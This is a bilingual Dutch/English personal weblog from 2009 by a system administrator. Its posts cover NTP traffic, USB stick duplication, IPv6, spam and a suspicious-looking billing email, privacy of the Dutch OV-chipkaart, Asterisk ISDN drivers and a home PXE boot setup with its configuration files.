De verbouwing is begonnen: vanmorgen ging ik weg toen er gegraven werd voor de vloer van de uitbouw en toen ik terugkwam was de vloer gestort. Ik maak foto's van de voortgang

I noticed requests for port 37/udp in our firewall to our ntp server. That is the 'daytime' protocol which is absolutely ancient in an Internet timescale. I opened the port and started the service as an experiment and started tcpdump on it. The results are interesting:

09:50:09.749723 IP xx.xx.178.51.37 > 131.211.84.189.123: NTPv4 client, strat 2, poll 7, prec -20
09:50:09.749782 IP 131.211.84.189.123 > xx.xx.178.51.37: NTPv4 server, strat 2, poll 7, prec -19
09:52:19.808243 IP xx.xx.178.51.37 > 131.211.84.189.123: NTPv4 client, strat 3, poll 7, prec -20
09:52:19.808301 IP 131.211.84.189.123 > xx.xx.178.51.37: NTPv4 server, strat 2, poll 7, prec -19
09:53:08.511939 IP xx.xxx.183.183.34505 > 131.211.84.189.37: UDP, length: 0
09:53:08.513364 IP 131.211.84.189.37 > xx.xxx.183.183.34505: UDP, length: 4

Most traffic seen by 'tcpdump port 37' is from source port 37. Which is an artifact of certain NAT devices translating privileged ports (< 1024) to other privileged ports. Certain versions ntpd seem to ignore these requests. But there are real clients using the 'daytime' protocol.

In een discussie over 'durf je nu echt AAAA records te publiceren' vroeg ik me af of er een goeie, klantvriendelijke ipv6 test is voor websites met behulp van javascript. Natuurlijk is die er: http://ipv6test.max.nl/. Die heb ik dus snel geimplementeerd op 2 websites op het werk die nog geen ipv6 verbinding hebben maar waar we dat wel snel hopen: www.cs.uu.nl en helpdesk.cs.uu.nl. Hier komen 'onze' gebruikers langs dus is het erg interresant om te weten of in deze gebruikersgroep er een aandeel is wat problemen gaat krijgen als we AAAA records publiceren.

I brought some more USB sticks to test with and tested the filler script with 4 sticks. Interesting new problem: some USB sticks are partitioned like a harddisk and some aren't, now to find what to mount. Trying to mount everything gives a lot of kernel error messages. Using vol_id was the way to find the valid filesystems. The writing speed is still at maximum when I write 4 in parallel and no USB errors happen.

Some measurable growth in IPv6 traffic at the Amsterdam Internet Exchange: they broke the 2 Gbit IPv6 traffic (after rrdtool rounding ;)) limit. Compared to the total traffic flow (764 Gbit) this is still a very small drop but there is growth in there. On to more and more applications, dns entries and traffic! Source: AMS-IX hits 2 Gbps IPv6 traffic - Fix6

One mailing list hoster, ivillage.com, is still sending me loads of the unwanted mailing list spam and making it quite hard to get rid of it. They have 49 mailing lists, the retaliating spammer signed me up to about 41 of them, and to get rid of them I have to uncheck every one of them to unsubscribe. The 'support' link on the site let me fill in a form which got an autoreply pointing me to the unsubscribe form on the site. So more attempts to get through to them that they need to verify the addresses they get via the site and to get rid of all of their mail in one go. Reporting each and every one of their mails via spamcop has not made much of a difference yet. The acceptable use policy of their provider xo.com prohibits sending mail like this:

A communication may be unsolicited if: (1) recipients' email addresses were not obtained through a personal or customer relationship between recipient and sender, (2) recipients did not affirmatively consent to receive communications from sender, or (3) recipients have opted out of receiving communications from sender when given notice of the opportunity to do so.

I never confirmed receiving their mail, so they break rule 2.

Ok, discovering 'all USB storage' is not that hard:

ALLSTICKS=`/bin/ls /dev/disk/by-path/*usb*part1 2>/dev/null`

Now for the choice whether to fill them in parallel or serially. With two sticks (the amount I have available at the moment for testing) running two rsync processes in parallel makes the whole script (discover, mount, fill with rsync, unmount) take 27 seconds, waiting for the first rsync to finish before starting the second one takes 35 seconds. Interesting will be how these numbers look when I add more USB sticks.

An interesting project at work: copying a given set of data to as big a number of USB storage devices as possible. So we buy 4 USB hubs, which got delivered today. Connecting them to the 4 different external USB ports on my laptop shows an interesting result:

 lsusb -t
Bus#  7
`-Dev#   1 Vendor 0x0000 Product 0x0000
  |-Dev#  35 Vendor 0x2001 Product 0xf103
  | `-Dev#  36 Vendor 0x0718 Product 0x0075
  |-Dev#  34 Vendor 0x2001 Product 0xf103
  |-Dev#  33 Vendor 0x2001 Product 0xf103
  `-Dev#  32 Vendor 0x2001 Product 0xf103
Bus#  6
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  5
`-Dev#   1 Vendor 0x0000 Product 0x0000
  `-Dev#  44 Vendor 0x0b97 Product 0x7761
    `-Dev#  45 Vendor 0x0b97 Product 0x7772
Bus#  4
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  3
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  2
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  1
`-Dev#   1 Vendor 0x0000 Product 0x0000
  `-Dev#  24 Vendor 0x413c Product 0x8140

Notice it? No? All the high-speed USB hubs (Vendor 0x2001 Product 0xf103) are behind the same root USB hub. Interesting USB congestion problems ahead probably.

My next step will be to discover all attached usb storage (probably thanking udev a lot in the process) and filling that storage with the wanted set of data.

Eneco werd wakker en stuurde antwoord! Eneco gaat kijken of het beter kan met de e-mail. En als ik naar 'mijn eneco' wil en het zelf in de browser wil intikken: http://www.eneco.nl/mijneneco of http://mijneneco.nl/. Beide geven (nu) de correcte redirect.

I just put a printout of the Google homepage under a barcode scanner and it indeed says: Google.

Nadat ik in Juni al last had van spam van idg uitgevers / Computer!Totaal krijg ik vanochtend weer e-mail van ze, dit keer op m'n hccnet adres (de hcc wil perse met je communiceren, dus ik moest mijn hccnet adres activeren om van computer!totaal af te komen toen die optie kwam). Blijkbaar hebben ze besloten bij IDG uitgevers om het ingaan van de nieuwe regels tegen spam in de telecomwet te vieren met een spamrun naar hun oude HCC adressenbestand.
Update 2009-10-06: Niet geheel onverwacht, ook Henk van de Kamer ergert zich aan dezelfde actie van IDG maar heeft de mail blijkbaar net gehad toen het nog 'minder strafbaar' was.

Suddenly I get numerous 'newsletter subscription' mails in my inbox, some declaring I subscribed and some asking me to confirm my subscription.

Samples:

Subject: You've Been Subscribed to iVillage!                                    

You have been subscribed to:

• YourTotalHealth Special Offers • Beauty & Style Top Ten • YourTotalHealth
Community Challenges 

Subject: Mind Tools Newsletter - Please Click Link to Confirm Subscription...   

Thank you for taking the first step in subscribing to the Mind Tools
Newsletter! There's just one more thing to do before your
subscription is activated,

Welcome!                                                       

Dear rty6ry,                                                                    

Welcome and thank you for subscribing to the Food
Reference weekly newsletter.   

Dear fyhfhfg,

Thank you for subscribing to UNESCO's Communication and Information Sector
newsletter.

We have registered your subscription with these details:

First Name ftgrt
Last Name  dggdf

I must have really pissed off some spammer to get some personal attention like this. GOOD. A spammer getting all worked up isn't spamming.
Too bad none of the mails tell me which IP address I 'subscribed' from, although I have a vague idea I need to search in the area of Heerlen / Kerkrade in the Netherlands.

All the subscriptions without confirmations will be reported as spam naturally.

Actual progress in windows printing: windows 2008 with office 2003 will give a warning message about trying to print an A4 document on a printer with Letter as default format. Fixed it by selecting the right papersize for the printer, no letter paper in this building. No PC LOAD LETTER on the printer display!

Wardriving results 31 August - 27 September 2009: 2491 new networks with GPS locations.

Er wordt best nagedacht over privacy in Nederland, er wordt alleen niets gedaan met dat nadenken! Twee artikelen gisteren: Zeg uw privacy maar gedag - DePers.nl. Met als afsluiter Bart Jacobs die het eens goed uitlegt:

‘We zijn’, zegt hoogleraar Bart Jacobs samenvattend, ‘databases aan het aanleggen waar de Stasi (de gevreesde veiligheidsdienst van de voormalige DDR, red.) jaloers op zou zijn. De OV-chipkaart, de paspoorten, het EPD, ga zo maar door. Die vingerafdrukkendatabase wordt een kentekenregister voor burgers. Aangelegd voor doel A, maar gebruikt voor doel B, C, D, en E. Het argument van publieke veiligheid wordt gebruikt, terwijl de individuele veiligheid er onder te lijden heeft. En waarom er zo weinig mensen tegen protesteren? Waarom onderzocht niemand de veiligheid van de cafés in Volendam, voordat ze afbrandden? Het moet eerst een keer heel erg mis gaan, vrees ik.’

Zelfs Amnesty International gaat zich nu zorgen maken over de vrijheid in Nederland, specifiek over de bewaarplicht: Staat van bewaring - Maarten Reijnders - Uit Wordt Vervolgd, oktober 2009. Het werk van Amnesty International wordt ook moeilijker door de bewaarplicht:

De bewaarplicht is een bedreiging voor de persvrijheid. Journalisten die misstanden aan de kaak stellen, kunnen vaak niet zonder goed ingevoerde bronnen die op voorwaarde van anonimiteit hun verhaal willen doen. Door de bewaarplicht zouden klokkenluiders zich wel eens twee keer kunnen bedenken voordat ze hun verhaal aan een journalist vertellen, vreest internetjournalist en privacyvoorvechter Brenno de Winter. Als internet- en telefonieaanbieders moeten bijhouden wie met wie contact heeft gehad, wordt het immers wel erg makkelijk voor de overheid om te achterhalen welke ambtenaar vertrouwelijke informatie heeft gelekt.

Europees

Blijkbaar 'denken' sommige spammers dat dat iets goeds is, gezien de subject regels van spam de laatste dagen. Voorzover je bij spammers kunt spreken van denken, natuurlijk.

Voor de casino-spammers zie ik het al langer, varianten van:

Subject: Sluit u vandaag aan bij Euro Club Casino
Als u op zoek bent naar een betrouwbare plaats om online te spelen, met een brede selectie aan spelen en Europese betrouwbaarheid, dan is Euro Club Casino de plaats voor u.

Maar eigenlijk zit de gespamde site (www.gold-royal.net) in China, geeft een redirect naar een andere site (keno-topgame.net) in de Ukraine waar een hele website gebouwd is met machine vertalingen. En dan komt geen rekening houden met mensen buiten de US wel heel dom over:

Bel gratis: 1-866-866-6945 / 1-866-546-0445 Internationaal: 1-266-481-2382

Maar nu ook de medicijnen-spammers, met nogsteeds de bar slechte machinevertalingen:

Subject: Top pillen Uit de Top Europese Apotheek
Uw online apotheek met blijvend lage prijzen belifert ze snel en gemakkkelijk. Geniet van het comfort van uw medicijnen Qualtitats comfort van hun woning in orde en 7 dagen per week de klok rond.

Zo op het eerste gezicht machinevertaald amerikaans engels. Willen amerikaanse spammers misschien toch europese medicijnen, en een europese gezondheidszorg?

Seen today: #twatch Open Hardware Networked LCD Screen - Slashdot Hardware. Quite tempting! Affordable (USD 45) and it can do cool stuff. By default it displays real-time topic trends from Twitter on an LCD. But with a bit of playing with LCDproc it can also show system statistics, RSS feeds, mail notifications, and more such as ... METARs.

Hope someone of the LCDproc development team picks this up soon: Although the page assumes there is a way to redirect a serial port to a network stream in linux this is a bit harder.

Een stukje geschiedenis: Jeroen van Inkel bij Radio Decibel! Beelden uit 1984: de laatste uitzending van Jeroen van Inkel bij Radio Decibel voor z'n overstap naar Veronica. Met een nog zeer jonge Adam Curry in beeld en andere gezichten die later nog goed terecht gekomen zijn in de Nederlandse radio en televisie.

Ook mooi om in de video te zien: jaren 80 kapsels en brillen, draaitafels voor de muziek en een echte draaischijftelefoon voor het radio bel spel. Ook is het geheel redelijk open voor een radio piraat.

The Decibel Tapes - Radio Decibel 1984

Gevonden via radio decibel video van lion keezer op clogwog.net
Update 2009-10-14: aangepast naar gewone link in plaats van embedded video omdat er (fragmenten van) niet-rechtenvrije muziek inzitten en ik geen zin heb in welles/nietes met Buma/Stemra over embedded muziek op een niet-commercievrije website.

Radio commercials for Linux: yes, it can be done, and they are now airing in Austin, Texas, United States of America. Tux Takes To The Air, with in true open source style an open source radio ad: one can use it and remix it. I like the line:

Why are you still paying for the privilege of using your computer? There's a better way: Linux.

Found via Slashdot: Forkable Linux Radio Ad Now On the Air In Texas

Blijkbaar is 'verdacht zijn van het getuige geweest kunnen zijn' al voldoende om afgeluisterd te worden door justitie: Gegevens anonieme beller tiplijn op straat.

Haar toestel werd op het moment dat ze naar de tiplijn belde afgeluisterd, omdat het Openbaar Ministerie haar zag als belangrijke getuige van de steekpartij.

Ik vraag me af waar we gegaan zijn van 'verdacht van een zwaar genoeg misdrijf' als reden om inbreuken op de privacy te plegen tot het excuus 'verdacht van getuige geweest te zijn'.

In plaats van een rode sportauto of snelle motorfiets besloot ik voor mijn recente 40e verjaardag een bijdrage te vragen voor een betere telelens. Uiteindelijk is de keus gevallen op de Canon EF 70-300mm F4-5.6IS USM. De volgende vraag is de keuze 'waar aan te schaffen'. Over elke webwinkel zijn wel positieve en negatieve reviews (tot en met halve rampscenario's) te vinden. Dus na wikken en wegen maar een goed overkomende web-winkel gekozen: Foto Konijnenberg. Bestelling net ingeklikt en bevestigd gekregen: de Canon EF 70-300mm F4-5.6IS USM 'ExtraPlus' dus met bijbehorend UV filter en zonnekap. Ik zal dit item bijhouden met de ontwikkelingen.

Dingen die in theorie nog net even beter zouden kunnen: Duidelijker maken dat je na het aanmaken van een account op de website en het bevestigen van die account nog je bestelling moet bevestigen. En een e-mail met bestellings-bevestiging zou prima aangepast kunnen worden aan de reeds gekozen betalings-methode.

2009-09-20 12:50: bestelling in elkaar geklikt, registratie e-mail.
2009-09-20 12:54: registratie bevestigd, bestelling afgemaakt en betaald via iDeal.
2009-09-20 13:02: e-mail bericht: spullen zijn op voorraad, staan gereserveerd en worden verzonden als de betaling binnen is (is dus een generieke tekst voor alle mogelijke betalingsmethoden. Dat geeft dus verwarring bij je klanten!). Bericht compleet met klantnummer en ordernummer.
2009-09-21 17:20: sms en e-mail bericht: order is verzonden, inclusief track & trace code voor de TNT Post website.
2009-09-22 09:30: ik probeer de track & trace code op de TNT post website: werkt, status 'Zending gesorteerd in sorteercentrum'.
2009-09-22 11:03: status 'Voorgemeld en gescand op rit'.
2009-09-22 13:12: status 'Chauffeur is onderweg'.
2009-09-22 17:39: status 'Geen gehoor bij 1 ste afleverpoging'. Vraag is natuurlijk of het nu vanavond nog een keer geprobeerd wordt of morgen overdag. Volgens het briefje de volgende dag.
2009-09-23 09:18: status 'Zending zit in afleverroute'. Die statusmelding heeft nog als datum 2009-09-22.
2009-09-23 11:35: status 'Chauffeur is onderweg'.
2009-09-23 21:16: een pakketje! Jawel, een lens!

The tapedrive-with-changer on the homeserver found itself in a wedged state with at the bottom of the dmesg output:

[105715.017656] ch 0:0:1:1: Attempting to queue a TARGET RESET message
[105715.017658] CDB: 0x1b 0x20 0x0 0x0 0x2 0x0
[105715.017663] ch 0:0:1:1: Command not found
[105715.017664] aic7xxx_dev_reset returns 0x2002
[105718.936191]  target0:0:1: FAST-10 SCSI 10.0 MB/s ST (100 ns, offset 15)

And still no access to the scsi tape drive. But, there is a bigger hammer nowadays named sg_reset which can fix this:

# mt -f /dev/nst0 status
/dev/nst0: Input/output error
# sg_reset -b /dev/sg0
sg_reset: starting bus reset        
sg_reset: completed bus reset
# mt -f /dev/nst0 status
SCSI 2 tape drive:
File number=0, block number=0, partition=0.
Tape block size 0 bytes. Density code 0x25 (DDS-3).
Soft error count since last status=0
General status bits on (41010000):
 BOT ONLINE IM_REP_EN

and it's back, not needing a reboot. The list of options says it all:

Usage: sg_reset  [-b] [-d] [-h] [-V] DEVICE
  where: -b       attempt a SCSI bus reset
         -d       attempt a SCSI device reset
         -h       attempt a host adapter reset
         -V       print version string then exit

   {if no switch given then check if reset underway}
To reset use '-d' first, if that is unsuccessful, then use '-b', then '-h'

Het blijft heel moeilijk, omgaan met e-mail voor bedrijven. Ik had bij Eneco aangegeven wel via iDeal te willen betalen (vanwege de acceptgirokosten, en ik weiger automatische incasso categorisch tot dat een keer veiliger gaat worden).

Vandaag zie ik een mailtje wat misschien van Eneco is:

Subject: Uw nieuwe Eneco nota staat online                                      

U ontvangt deze email omdat u heeft gekozen voor de betaalwijze online betalen. 
                                                                                
Uw nieuwe Eneco nota staat online

Geachte mevrouw, heer,

Er staat een nieuwe nota voor u klaar op Mijn Eneco. U vindt deze nota          
bovenaan in het notaoverzicht. Door op de nota te klikken, krijgt u             
uitgebreide informatie over deze nota. U kunt de nota direct betalen            
door op de iDEAL-button achter de nota te klikken.

Direct mijn nota betalen
http://public.tripolis.com/r/9VZEywtA1Zi[...]

Geen idee wat tripolis.com is, maar ik ga niet zomaar op een 3e partij link klikken voor een betaling. Mensen proberen naar een hele andere site te sturen en dan geld te laten betalen heet 'phishing'.

Ook de headers van het mailtje geven geen vertrouwen:

Received: by outbound1.tripolis.com (PowerMTA(TM) v3.5r13) id hm7fqm0j2qks for  
        <xxxxx@yyyyyyyyyyyyy>; Thu, 17 Sep 2009 09:05:09 +0200 
        (envelope-from )                          

Geen Eneco server. Geen verwijzing naar een Eneco site. De 'echte' Eneco site gebruikt https met een EV certificaat.

Met wat zoeken in de 'mijn eneco' omgeving ontdek ik wel de openstaande betalingen. Ik verwachtte dat na het inloggen gelijk een 'u heeft een betaling openstaan' melding zichtbaar zou zijn, maar ik moest even zoeken.

Direct maar een melding achtergelaten op de Eneco site:

Ik heb aangegeven Eneco via iDeal te willen betalen, maar nu ontvang ik een mailtje wat pretendeert van Eneco te zijn voor de betaling, maar de link 'Direct mijn nota betalen' wijst naar een 3e partij - tripolis.com - waar ik niets mee te maken heb en die geen https met (EV) certificaat gebruiken. Ook blijkt uit de headers dat de mail niet afkomstig is van servers van Eneco. Elke phisher kan dit soort e-mails namaken en een mooie eigen fake-betaal site bouwen.

Gelukkig kan ik - na het nodige zoeken - ook in de wel-beveiligde omgeving van mijn eneco een verwijzing naar de betaling vinden, dus ik ben in staat om de rekening te betalen zonder de verdachte link te gebruiken.

Ik vraag Eneco om zo snel mogelijk de teksten in de e-mail berichten aan te passen zodat elke schijn van misleiding vermeden wordt en klanten uit te nodigen naar de eneco website te gaan om daar binnen de beveiligde omgeving de betaal-verwijzing te kunnen vinden. Hiervoor zou het ook handig zijn als de url https://mijn.eneco.nl/ werkt, mijn eerste gok van de 'mijn eneco' website.

Anders ben ik genoodzaakt weer terug te schakelen naar betaling per acceptgiro EN bezwaar te maken tegen eventuele acceptgiro-kosten, zie http://blog.iusmentis.com/2009/08/31/kosten-bij-acceptgiro-onredelijk-bezwarend/ .

Ik ben benieuwd naar de reactie.

Update 2009-09-17: Even opgezocht: tripols.com noemt zichzelf E-mail marketing software & delivery. Een van hun 'solutions' is dat ze zich specialiseren in 'deliverability' van business e-mails ondanks spam filters. Ruikt als een spammer, dus.

Het zou veel meer helpen als Eneco gewoon zelf deze e-mail berichten zou verzenden, zonder derde partij tracking link en met een geldige en verifieerbare digitale handtekening middels PGP of S/MIME.

Update 2009-10-06: Nog geen reactie van Eneco behalve de bevestiging van mijn bericht. Ik heb maar eens een reminder gestuurd.

Update 2009-10-08: Antwoord: ze begrijpen de verwarring met het gebruik van het domein tripolis.com en gaan er binnen Eneco naarkijken of het beter kan.

The asterisk setup with bristuff-patched zap and the qozap driver failed bigtime: a call to the internal phone failed and diverted to voicemail within 2 seconds. Back to a working mISDN version. But I can't unload the mISDN drivers correctly so it took a few reboots to get things right again.

Outgoing calls without echo are nice, but I also need incoming calls to work. According to the kernel messages I should have working echo cancellation:

[  132.157748] mISDN_dsp: Audio DSP  Rev. 1.29 (debug=0x0) EchoCancellor MG2 dtmfthreshold(100)
[  132.157753] mISDN_dsp: DSP clocks every 80 samples. This equals 1 jiffies.

Time to start testing stuff on a testserver so I don't have to reboot the home server greenblatt so often.

One good effect from the change in isdn driver: telephony sounds a lot better. This is probably because zaptel automatically enables echo cancelling:

Sep 11 20:34:38 greenblatt kernel: [ 2954.439478] Zapata Telephony Interface Registered on major 196
Sep 11 20:34:38 greenblatt kernel: [ 2954.439483] Zaptel Version: 1.4.10
Sep 11 20:34:38 greenblatt kernel: [ 2954.439484] Zaptel Echo Canceller: MG2

Today I decided to put some time in trying to use a different driver for using the openvox B200P card in the ubuntu installed asterisk in home server greenblatt. mISDN has a few stability issues in this setup (ubuntu 8.04 LTS amd64, asterisk 1.4.17 from ubuntu source recompiled for misdn support) where I can't unload the driver (instant kernel warning message and module system wedged) and sometimes after a long while the internal channel got confused and rejected calls, needing a restart of Asterisk.
So I tried the other route: the qozap driver with bristuff patches which comes with ubuntu as package zaptel-source. Configuring this driver was a bit of a puzzle. Step one: don't load ztdummy because that will confuse the channel ordering. TE / NT choice is done by the module parameter ports for the module, the bitmapped value of the TE / NT configuration. In my case I created /etc/modprobe.d/zaptel with:

 
options qozap ports=2

So the second port is switched to NT mode, which matches the jumper setup. The working samples are documented at ZaptelBRI - voip-info.org.
The qozap driver sort of works on the TE side (the side facing the phone company). Diving deeper into docs from openvox showed that the openvox cards need a slightly changed qozap driver source from http://downloads.openvox.cn/pub/drivers/bristuff/patches/. It helps to find that the version of bristuffed in Ubuntu 8.04 is probably 0.4.0.
The current state is working up to a level: I can dial numbers from the internal isdn phone to the external isdn line and I can accept calls, but trying to get dialtone from asterisk results in:

    -- Extension 's' in context 'internte' from 'xxxxxxx' does not exist.  Rejecting call on channel 0/2, span 2

which looks like the problem mentioned in Re: [Asterisk-Users] zaphfc problem: overlapdial don't work after update bristuff but that change (and a complete recompile of my asterisk package) did not do the work. Browsing the source of chan_zap shows a lot of places where it can decide to switch to 's'.

Bas Dekker kan naast heel mooi fotograferen ook heel goed schrijven over fietsen. In het snelfietspad kom ik een aantal beleidsvoorstellen tegen waar ik het riant mee eens ben. Een opmerking onderaan springt er voor mij uit:

Eerst maar eens al die levensgevaarlijk verzakte tegelfietspaden een beetje oplappen met dat geld. En een degelijke cursus uitwerken die uitgelubberde wegbeheerders leert dat je met een fiets harder kunt dan 15 kilometer per uur waaruit volgt dat hoeken van negentig graden in een fietspad op zijn zachtst gezegd een beetje hufterig zijn.

Ik ben helemaal voor! Zeker in iets wat een 'doorgaand fietspad' is is de zoveelste 90-graden hoek irritant. In 80-kilometer wegen zitten ze ook niet zomaar zonder waarschuwing.

Vandaag reisde ik met de bus naar huis, en de GVU bussen accepteren nu ook de ov-chipkaart dus heb ik dat eens getest. Op zich een goede ervaring en een mooi systeem, alleen het grote bezwaar blijft de privacy van het systeem.
Bij de eerste keer inchecken vroeg ik me bij de tekst goede reis nog af of het verschil met uitchecken wel zichtbaar zou zijn. Maar gerekend vanuit een vervoersaanbieder wens je natuurlijk iemand die instapt een positieve ervaring en is iemand die uitstapt klaar met reizen.
Bij het uitchecken is de tekst tot ziens en de kosten van de reis linksonder en het overgebleven saldo rechtsonder.
Bij de tweede bus zag ik overstap bij het inchecken bij instappen. De chauffeur leek nog wat onwennig te kijken. Communicatie met de chauffeur is nu helemaal niet meer nodig. Voor de meeste buschauffeurs zal dat minder gezellig zijn, gezien de reacties van Amsterdamse buschauffeurs op een "goedemorgen" of "goedemiddag" voor hun juist een vooruitgang.

Maar, de privacy. In de bestanden van Trans Link Systems staat nu de volgende 7 jaar, dus tot 4 september 2016, dat 'mijn' ov-chipkaart op 4 september 2009 gebruikt is om van halte Padualaan naar halte Centraal Station Utrecht stadsbussen te reizen en van Centraal Station Utrecht stadsbussen naar Taagdreef te reizen. Vast met de tijden tot op de seconde er bij. Volgens het privacybeleid van trans-link systems (pdf) gaat het GVU niet zomaar er achter komen wat mijn naam en adres zijn. En volgens de ov-chipkaart veelgestelde vragen:

Trans Link Systems B.V. heeft in haar systemen en organisatie een veelheid aan maatregelen getroffen om de privacy van persoonsgegevens te waarborgen. Zo ook hoe moet worden omgegaan met vorderingen van Jusitie en politie. Uw persoonsgegevens kunnen alleen doorgegeven worden wanneer er sprake is van een officiële vordering van Justitie en/of politie.

Dus het is niet zoals bij het Centraal Informatiepunt Onderzoek Telecommunicatie (CIOT) dat elke politie-agent en boswachter ongestoord in die gegevens kan gaan zitten neuzen. Brenno de Winter heeft ontdekt dat Trans Link Systems dit nog lijkt te menen ook: Mag je foto’s van de OV-chipkaart opvragen? - Bigwobber: wie vraagt, krijgt meer. Justitie blijkt dus wel de gegevensverzameling van TLS te zien als aquarium waarin ze uitgebreid mogen vissen, maar TLS was op de hoogte van het verschil tussen een niet-gevoelig persoonsgegeven (naam, adres) en een gevoelig persoonsgegeven (foto). Ik zou aanwezigheid op een bepaalde locatie op een bepaalde tijd ook een gevoelig persoonsgegeven willen noemen wat justitie niet mag opvragen.
Geen woord tussen de veelgestelde vragen over de ov-chipkaart over de toegang door veiligheidsdiensten dus ik neem maar even aan dat die hetzelfde behandeld worden als justitie maar dat daar nooit over gepubliceerd mag worden vanwege de 'staatsveiligheid'.

De gegevensverzameling van de reisbewegingen is natuurlijk een database die alleen maar te beveiligen is tegen misbruik door hem niet aan te leggen en de bestaande gegevens te vernietigen. Er gaan gevallen komen van misbruik. Vissen door justitie wie er ergens geweest is is een eerste misbruik maar er komt vast meer. Want altijd krijg je 'maar die gegevens zijn er toch' voor justitie. Of iemand met toegang tot de gegevens die niet zo integer blijkt te zijn. Wat zou de sanctie zijn voor een beheerder van Translink die een eigen query doet op de database?

Eigenlijk is het helemaal niet mijn ov-chipkaart: het is een verlopen NS-abonnement van iemand anders. Volgens de algemene voorwaarden van de ov-chipkaart (pdf) mag dat helemaal niet:

21. Alleen de Kaarthouder van een Persoonlijke OV-chipkaart mag die OV-chipkaart gebruiken.

maar zolang ik reizen maak waarvoor ik betaal voldoe ik volgens mij aan de wet. En dan hoef ik niet nog een keer voor een ov-chipkaart te betalen.

Je mag van translink systems altijd je ov-chipkaart beëindigen als je het niet eens bent met hun voorwaarden, dan krijg je zelfs het resterende saldo nog terug. Wat ze er alleen niet bij vertellen is hoe je na de volledige invoering van de ov-chipkaart dan nog het openbaar vervoer in Nederland kan gebruiken.

I updated my PXElinux boot menu with a few changes to the pxelinux.cfg/default so there are a number of handy extra booting options:

DEFAULT vesamenu.c32
PROMPT 0

TIMEOUT 100

MENU TITLE Heavy Duty Boot Service
MENU BACKGROUND boot.jpg
# http://www.flickr.com/photos/bottinex/2948585175/

LABEL local
MENU LABEL ^Boot from local disk (default)
        localboot 0

LABEL memtest
MENU LABEL ^Memory test
                kernel memtest86

LABEL pldrescue
MENU LABEL ^PLD Linux rescue
        KERNEL pld-20090221/boot/isolinux/vmlinuz
        APPEND initrd=pld-20090221/rescue.cpi,pld-20090221/custom/custom.cpi root=/dev/ram0 CONF=”`/dev/fd0:/rescue`;;;;;;;;;;;”
        IPAPPEND 1

LABEL ubuntu-i386
MENU LABEL Ubuntu i386 menu
        KERNEL menu.c32
        APPEND ubuntu-installer/ubuntu-i386.cfg

LABEL ubuntu-amd64
MENU LABEL Ubuntu amd64 menu
        KERNEL menu.c32
        APPEND ubuntu-installer/ubuntu-amd64.cfg

LABEL cpuid
MENU LABEL ^Identify Processor
        KERNEL cpuidtest.c32 

The ubuntu submenus are copied from the ubuntu CD's and slightly adjusted to the local situation:

MENU TITLE Ubuntu i386 menu
DISPLAY ubuntu-installer/i386/boot-screens/boot.txt

LABEL install
        kernel ubuntu-installer/i386/linux
        append vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 
LABEL linux
        kernel ubuntu-installer/i386/linux
        append vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 
LABEL cli
        kernel ubuntu-installer/i386/linux
        append tasks=standard pkgsel/language-pack-patterns= pkgsel/install-language-support=false vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 

LABEL expert
        kernel ubuntu-installer/i386/linux
        append priority=low vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 
LABEL cli-expert
        kernel ubuntu-installer/i386/linux
        append tasks=standard pkgsel/language-pack-patterns= pkgsel/install-language-support=false priority=low vga=normal initrd=ubuntu-installer/i386/initrd.gz -- 

LABEL rescue
        kernel ubuntu-installer/i386/linux
        append vga=normal initrd=ubuntu-installer/i386/initrd.gz rescue/enable=true -- 

LABEL mainmenu
        MENU LABEL Return to main menu
        KERNEL vesamenu.c32
        APPEND ~

The PLD Linux rescue CD is ofcourse based on PXE remote boot for your home/work lab. I tried the Ubuntu 'rescue' mode once but the PLD linux rescue environment works a lot better for me.

One downside of a weblog such as the hcc!pc netwerkgroep website is 'trackbacks' being tried for linkspam. So serendipity is configured to accept trackbacks but keep them all for verification, so visitors don't see all the linkspam left by criminals. The 'score' of about one week of linkspam:

serendipity=> delete from serendipity_comments where status='pending';
DELETE 337

A bit of reading on pxelinux and syslinux and it looks easy to set up my own pxeboot server at home so I don't have to fiddle with floppies, cd-roms or other media anymore.

First of all I wanted the dhcp server to only respond with pxelinux to real pxe clients. There is other stuff which uses dhcp and tftp and might get confused by pxelinux.0 being offered as boot image such as VoIP phones. That can be done with the following in the right context in dhcpd.conf:

    if substring (option vendor-class-identifier, 0, 9) = "PXEClient" {
        filename "/pxelinux.0";
        next-server 10.42.2.1;
    }

Next a tftp server is needed, I installed atftpd serving /tftpboot.

The next part is the menu structure for pxelinux. The following files are in /tftpboot:

root@greenblatt:/tftpboot# ls -lR
.:
total 628
-rw-r--r-- 1 root root  30920 2009-09-01 21:20 boot.jpg
-rw-r--r-- 1 root root 307200 2009-09-01 20:06 boot.png
-rw-r--r-- 1 root root 103204 2009-09-01 21:23 memtest86
-rw-r--r-- 1 root root  35732 2009-09-01 18:29 menu.c32
-rw-r--r-- 1 root root  14146 2009-09-01 17:57 pxelinux.0
drwxr-xr-x 2 root root   4096 2009-09-01 21:34 pxelinux.cfg
-rw-r--r-- 1 root root 122988 2009-09-01 18:29 vesamenu.c32

./pxelinux.cfg:
total 8
-rw-r--r-- 1 root root 117 2009-09-01 18:02 bootmenu.txt
-rw-r--r-- 1 root root 463 2009-09-01 21:34 default

And the content of pxelinux.cfg/default is:

DISPLAY bootmenu.txt

DEFAULT vesamenu.c32
PROMPT 0

TIMEOUT 100

MENU TITLE Remote Boot Services
MENU BACKGROUND boot.jpg
# http://www.flickr.com/photos/bottinex/2948585175/

LABEL local
MENU LABEL ^Boot from local disk
        localboot 0

LABEL memtest
MENU LABEL ^Memory test
                kernel memtest86

Note that the memtest86+.bin image is renamed memtest86: the original filename did not want to boot.

The image of the heavy duty boot is rotated and scaled to 640x480 and brought down in quality. I will probably add the PLD linux rescue CD image and ubuntu so I won't be bothered by boot medium problems anymore. An environment for a heavy duty boot, hence the image.

What do you get when documentation for Polycom SoundPoint IP phones suggests.. and suggests again and again you should set up an ftp account PlcmSpIp with password PlcmSpIp? Well, what do you expect other than:

Sep  1 13:12:44 greenblatt sshd[24658]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:12:47 greenblatt sshd[24661]: Invalid user PlcmSpIp from 220.132.192.198
Sep  1 13:12:50 greenblatt sshd[24753]: Invalid user PlcmSpIp from 220.132.192.220
